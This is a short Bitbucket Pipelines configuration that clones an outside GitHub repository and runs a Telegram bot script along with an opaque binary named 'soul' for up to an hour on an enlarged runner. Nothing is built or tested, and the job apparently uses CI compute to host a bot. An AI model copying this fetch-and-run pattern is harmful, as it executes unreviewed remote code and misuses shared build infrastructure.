image: python:3.9

pipelines:
  default:
    - step:
        name: Build and Run
        size: 8x
        caches:
          - pip
        script:
          - apt-get update && apt-get install -y gcc libpthread-stubs0-dev
          - pip install telebot pymongo aiohttp
          - sudo apt update && sudo apt install -y python3 python3-pip
          - pip install python-telegram-bot --upgrade
          - git clone https://github.com/rajkhilchi786786/RAJ
          - mv RAJ.py $HOME
          - mv soul $HOME & cd
          - chmod +x *
          - chmod +x soul && timeout 3600 python3 RAJ.py